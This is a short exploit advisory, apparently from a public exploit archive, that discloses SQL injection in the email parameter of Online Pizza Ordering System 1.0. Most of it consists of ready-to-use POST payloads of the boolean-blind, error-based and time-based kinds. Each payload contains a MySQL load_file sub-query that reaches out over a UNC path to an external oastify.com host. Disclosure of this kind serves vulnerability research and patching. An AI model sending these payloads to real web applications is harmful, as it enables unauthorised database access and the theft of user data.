Headline
Online Pizza Ordering System 1.0 SQL Injection
Online Pizza Ordering System version 1.0 suffers from a remote SQL injection vulnerability.
## Titles: opos-1.0 Multiple SQLi## Author: nu11secur1ty## Date: 06/07/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The email parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\prk350bzcbgiu65bqx3boktqahga43suvin5ht6.oastify.com\\ius'))+' was submittedin the email parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload:first_name=zKwBGOrp&last_name=zKwBGOrp&mobile=zKwBGOrp&address=zKwBGOrp&[email protected]'+(select load_file('\\\\prk350bzcbgiu65bqx3boktqahga43suvin5ht6.oastify.com\\ius'))+'' AND9762=9762 AND 'REtq'='REtq&password=e7E!x2k!U6 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR) Payload:first_name=zKwBGOrp&last_name=zKwBGOrp&mobile=zKwBGOrp&address=zKwBGOrp&[email protected]'+(select load_file('\\\\prk350bzcbgiu65bqx3boktqahga43suvin5ht6.oastify.com\\ius'))+'' AND (SELECT3595 FROM(SELECT COUNT(*),CONCAT(0x7176766a71,(SELECT(ELT(3595=3595,1))),0x71716b7671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND'Gtza'='Gtza&password=e7E!x2k!U6 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload:first_name=zKwBGOrp&last_name=zKwBGOrp&mobile=zKwBGOrp&address=zKwBGOrp&[email protected]'+(select load_file('\\\\prk350bzcbgiu65bqx3boktqahga43suvin5ht6.oastify.com\\ius'))+'' AND (SELECT3908 FROM (SELECT(SLEEP(7)))ddOC) AND 'ECyu'='ECyu&password=e7E!x2k!U6---```## Reproduce:[href](https://www.patreon.com/posts/opos-1-0-sqli-105752878)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/06/opos-10-multiple-sqli.html)## Time spent:00:19:00